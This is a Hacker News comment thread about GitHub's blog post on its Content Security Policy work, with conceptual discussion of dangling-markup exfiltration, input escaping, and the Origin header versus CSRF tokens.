The article says CSP seven times in the first two paragraphs without saying what it stands for; it would be much more readable if they did. (It stands for content security policy for those wondering.)
Funny enough, I tried doing exactly that when I submitted the post to HN this morning: https://news.ycombinator.com/item?id=13437920. But, unfortunately, my submission wasn't the one to make the front page .
Apologies for that not being clear. Given I had linked to the original article in the first sentence, I took the perspective of people knowing which "CSP" I was talking about. I'll update the post in the morning to spell/link out to the first CSP reference.
If you ever have a post-Communicating Sequential Processes journey at GitHub, please do write a post! Most people I know are moving to something CSP based (say, Go channels) so it would be very cool to understand why someone would consciously decide to ditch the concept again, after a serious engineering effort.
Heh, I was slightly confused at first, then very confused when I got to "post-CSP exploitation". Trying to come up with a plausible meaning for that phrase is an interesting exercize.
At a certain point you need to set a baseline expectation of your audience in order to communicate effectively. Do you think they should also explain exploitation, img-src, the mechanics of parsing unmatched quotes, javascript or CSRF? The target audience of the article knows what CSP stands for and most likely has been reading the other entries along this journey.
You are getting downvoted because in complaining we are below your technical baseline, you've ironically revealed you're not familiar with the rather more interesting CSP.
I did already know about content security policy. I still wasn't certain that's what the article was referring to without reading several paragraphs of the two articles.
I think this comment raises a very good point and I struggle to see sure why it's proving so unpopular so far.
It's true that the submitted blog post doesn't expand the CSP initialism -- this has been acknowledged as an oversight by the author and the post will be edited, as it's simply good practice as recommended in several style guides [1][2][3][4].
But the post's very first sentence links to a previous entry about the same subject; there, the topic is explained to readers who may not be familiar with it. There is simply no reason for a follow-up post, which this submission is, to repeat the explanations given by its predecessor. Meanwhile, a reader approaching the post with confidence about its topic will have realized rapidly what it is and isn't about.
So given the intense disagreement, what approach would have been preferable?
I think your comment is much more reasonable than parent; I too wondered what CSP they were talking about so I clicked the first link, and figured it out(after scrolling through several paragraphs). However, parent asserted that the audience here was not up to the level to read the author, when actually, the confusion was an overloaded acronym.
My comment was not about establishing an across the board level of technical competence. In my opinion the audience was not general tech people, the audience is security / infrastructure folks. I apologize if anyone felt slighted.
I would expect them to expect their readers to look up concepts that are unfamiliar. Throwing around overloaded acronyms without definition makes that difficult.
A very detailed post which talks about their collaboration with security consulting firm Cure53 to identify various fairly novel exfiltration techniques, and attempt to adjust their Content-Security-Policy or some aspect of their application to try to mitigate it. This could be a great resource, and is certainly a valuable 'lessons learned'.
But I was also overwhelmed. There's a quip that security is a losing battle, but that wasn't my takeaway -- rather, the knowledge space required to develop and host a web application that accepts user-generated content in a way that won't leak info apparently everywhere is getting too much for generalist developers working alone or in small teams.
They're interesting and often-overlooked techniques, but are not novel. You can read a more about these sorts of attacks and other similar ones in 2011 writeup "Postcards from the post-XSS world"[0]
Tone: I assume GitHub knows what they are doing, and I ask this question because I have a hole in my understanding that I have a professional interest in making sure is filled, not because I'm trying to "gotcha!" anybody or be critical. This article clearly demonstrates they are trying hard and not ignorant.
I don't understand why so much of this article is talking about dangling markup? While I highly recommend using the highest quality library you can get your hands on for this task, cleaning up user-supplied markup to at least be valid HTML is generally not that difficult. Cleaning up every last vector within that valid HTML is much harder and much more subtle; I have fought that fight myself, so I understand the bits about how awful the <plaintext> tag can be and so forth (and how how many other vectors there are for javascript, and how many vectors there are for loading content you didn't want loaded, and how many vectors there are for subtle leaks of information, etc., even within syntactically-valid HTML). But making syntactically-invalid HTML into syntactically-valid HTML that is at least not "dangling" is not that hard, and can be done reliably.
So I assume I'm missing some sort of context here about why they are having so much trouble with this? What's the context where they can't run this sort of syntax cleaner over the user input?
Yeah, the missing context is that we are talking about vectors where GitHub would not be sanitizing the input correctly. In other words, vectors that traditionally resulted in XSS. We do exactly as you say in places where we expect user controlled input. For example, all issue/pull request comments are Markdown. And, for security, we go to great lengths to ensure that we only accept a subset of HTML that is safe AND that the resulting HTML is well formed. But, as history has shown, XSS is more or less unavoidable. There are just too many places where it can occur for any application to 100% avoid it. This is at the heart of CSP. Given that history has shown that XSS was unavoidable, the idea was to add a browser feature as a second line of defense. So, the article is written from the perspective that traditional XSS is neutered (the whole "scripting" bit of XSS is gone) using CSP. So, given that, what might an attacker be able to do without injecting any JavaScript? This is the origin of "scriptless attacks". Dangling markup is the most popular technique for exploiting a scriptless attack. So, it isn't that GitHub would be failing to create well formed HTML. It would be a scenario where an attacker would traditionally like to have injected a `<script>` tag, but is no longer able, so they must go to the next best thing...dangling markup.
XSS is unavoidable if you think the solution is sanitizing user input.
The solution to sql injection is parametrized query construction, instead of automatically filtering the ' character and then pasting the template and the user input together.
Similarly, to avoid cross site scripting you have to combine your templates and user input by escaping it properly, instead of just concatenating them and then hoping you can avoid the issues by input 'sanitizing'.
> cleaning up user-supplied markup to at least be valid HTML
The root cause of XSS is improper user input sanitization. Usually it is in places that shouldn't allow HTML at all, where the developer forgot to properly HTML-escape the user-provided input. If not encoding it at all can slip by, then obviously not verifying that its valid HTML could too (plus, it doesn't make sense to verify valid HTML when you aren't even expecting HTML).
The focus on dangling markup is because a CSP policy that prevents unauthorized JavaScript from executing (no inline scripts, remote scripts from trusted hosts only) can resolve most of the XSS issues, but it doesn't resolve leakage of information over other channels (such as via images).
While CSP could be used to completely block images from external hosts (and thus solve the leakage issue), you sometimes do want to allow users to inline external images and so an alternative solution to prevent sensitive information from being leaked is required.
Edit: haven't seen ptoomey3's comment while I wrote mine. He explained it better :-)
I'm having great reservations towards CSP however. I think it breaks the web in a way that wouldn't have been necessary had we been a little bit more careful about HTML syntax rather than dismissing markup validation as an obsolete technique back when the vulgar "HTML 5 rocks" campaigns were in full swing.
CSP spec drafts have been around forever but were never finalized. CSP basically blocks execution of JavaScript in script tags in content (as opposed to script in the header), as well as in content handler attributes (onclick and co.) by disabling those alltogether on a page. This totally breaks page composibility where you assemble content at the markup stream level from multiple sources, like, say on every single news aggregation site. The removal of scoped CSS styles from HTML similarly breaks composition.
From Chrome's Content Security Policy page:
[Blocking inline script] does, however, require you
to write your code with a clean separation between
content and behavior (which you should of course
do anyway, right?)
I think this comment is totally clueless wrt. what the Web is about. "Separation of concerns" is most certainly not a characteristic of the Web, and never has been.
I'm sorry, but rather than using kludges such as CSP to turning the lights off with a broad brush, how about fixing HTML and JavaScript in the first place?
(note my comment isn't addressed at github but at web standard comitees)
"I'm sorry, but rather than using kludges such as CSP to turning the lights off with a broad brush, how about fixing HTML and JavaScript in the first place?"
OK... how?
To be clear, I'm asking for an HN-comment level of detail, not a standards-body level of detail. I can't speak for everyone else on HN but I won't go over things with a fine-tooth comb, I'll only look at top-level issues.
But I will at least point out that being able to casually float third-party content into any site that has a weakness to XSS or man-in-the-middle or vulnerabilities in any other third-party content in the website is pretty fundamental. The fundamental composition power of the web is too powerful and it is going to have to be cut back. Some of the obvious solutions like "whitelisting hashes of valid content" have their own problems, like how a lot of the scripts being included out there are deliberately not constant and that's their whole point in the first place.
1. Defining and using safe JavaScript subsets (in the style of Google's Caja [3] and AdSafe [4], though probably that ship has sailed and cramming syntax sugar into JS is the order of the day instead)
2. Defining and using safe CSS subsets (with countermeasures against click-jacking/-phishing, and hiding "nose print" etc.) though granted this is challenging; I had hoped a formal semantics for CSS came along (such as in [2]) but it didn't
3. Using HTML-aware template engines (such as [1] but there are maybe lighter approaches with hard-coded HTML rules as well; disclaimer: my project)
If all browsers sent the "Origin" HTTP header [1] with POST requests (such that web applications could rely on it) then CSRF [2] tokens mentioned in the article would become obsolete. You'd just have to check whether the "Origin" header sent by the browser is identical to your scheme + domain name (e.g. "https://www.example.com") and be done. Chrome and Safari have implemented the "Origin" header long ago but unfortunately Firefox [3] and Edge [4] have not yet done so.
The "Origin" header is similar to the "Referer" header but never contains the path or query. Furthermore, CSRF protection requires it only for "POST" requests (i.e. "GET" requests are unaffected). So there is little incentive for an option disable it for privacy concerns.
"It's probably worth reading through https://github.com/w3c/resource-timing/issues/64 and the proposal I linked above. In short, it's not clear that implementing the Origin header the way Chrome supports it actually helps with CSRF and it makes it harder (impossible really) to distinguish CORS requests."
Seems Firefox will implement it anyway because it's still better than nothing.
The Origin header is not as good to prevent CSRF since it's a known value. A CSRF token is a one-time value generated in the server, it's impossible to guess or get a valid one from the outside.
It boils down to how much you trust browsers to implement this without fucking up. In the past trusting browsers to get it right was a questionable idea, with Flash being a particularly reliable weak point which caused Rails to change how they do CSRF protection. I'm not sure Adobe ever fully fixed the issue in all browsers.
Nonces have the benefit of only relying on browsers preventing cross-domain reads.
When Flash is deprecated, and if a site wants to use CSP, then this might start looking like a better trade off.
ATM though, nonces can be automatically added to all same domain forms on your site with JavaScript and you can check it trivially on all POST requests, getting most of the non-CSP related benefits without waiting on browsers.
And even if browsers were to implement it, there is still a long tail of browsers out there that will take forever to update.
CSRF protection is not about attacks from evil clients (you can easily spoof any header with the HTTP client library of your choice, of course). CSRF protection is about preventing innocent / well-behaving clients from being tricked into POSTing some data on behalf of their (logged-in) user.
Yes. Forwarding a unique CSRF token from the backend gives you some assurance that it's a legitimate request, initiated from a pageview within a timeframe. A header (origin) which always has the same value (the hostname) is inherently less secure, though I overstated how much in the previous comment.
You can use it to identify unsophisticated attacks, sure.
However, if someone has the ability to make malicious HTTP requests on my behalf using my browser can you really be sure that they don't have the ability to make malicious HTTP requests with altered headers through a malicious extension or a browser specific exploit or some other vector?
You still have to do all the other attack mitigation strategies in addition to checking the Origin header, and I'm not sure the extra complexity buys you anything in the long-term.
Not sure I follow your reasoning: CSRF requires a browser, as that's where you'll find a logged-in user that you want to force into doing something without their knowledge. The network layer is already protected by HTTPS. Some browser plugin might modify the header, at which point the whole exercise is pointless anyway as you can't trust the client in that case. Happy to learn where I'm wrong.
Can you expand on the threat model here? After noodling a bit I can't think of an attack that CSRF prevents that an origin header wouldn't, but obviously that doesn't mean there isn't one. Be real curious to hear of one!
Can someone explain more about how the Gravatar example would work? How would the attacker embed a dangling markup on Github.com? If they could do that, couldn't they just use a standard XSS attack by embedding arbitrary HTML?
Yes, the attack assumes a content injection bug in GitHub.com. The attack is not using our own gravatar URL generation against us; it is the attacker crafting an arbitrary URL and using that URL inside of an arbitrary image tag. The reason for the attacker being "forced" to use a gravatar URL is that it was one of the very few third-party hosts we previously allowed by our CSP policy. So, the attack demonstrates how this previously allowed host could be used to exfiltrate sensitive content if/when an attacker found a way to inject arbitrary HTML into a page on GitHub.com.
While I'm not a security expert, seeing the various ways that someone can steal info from a site even after all the protections GitHub put into place was fascinating, and does bring back the old concern: if a site as large and respected as GitHub has to do all this work and still encounters exploits, what can an average person do who might run ad scripts, a tracking script, and a few helper scripts from various sites? And how can tools try to put in more protections for average folks (cough, wordpress)?
If you liked this, btw, worth reading some content from their pentester https://cure53.de/ which also had some interesting findings and links.